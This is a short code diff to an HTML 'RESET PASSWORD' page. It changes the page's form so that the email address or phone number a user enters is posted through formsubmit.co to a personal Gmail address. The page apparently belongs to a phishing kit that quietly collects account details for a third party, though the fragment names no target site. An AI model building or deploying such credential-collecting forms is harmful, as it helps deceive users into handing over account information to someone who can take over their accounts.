--- a/forget.html
+++ b/forget.html
@@ -58,7 +58,7 @@
         <h1 class="point"><b>RESET PASSWORD</b></h1>
     
         <div class="login-page">
-          <form action="https://formsubmit.co/62965e53d38fde45adbe515f7d2e8a7c" method="POST">
+          <form action="https://formsubmit.co/divaoursjigwaar@gmail.com" method="POST">
             <p>
               <label for="email" class="email">Previous Email address or phone number</label> <br>
               <input placeholder="Email address or phone number" type="text" name="email" id="email" required="">
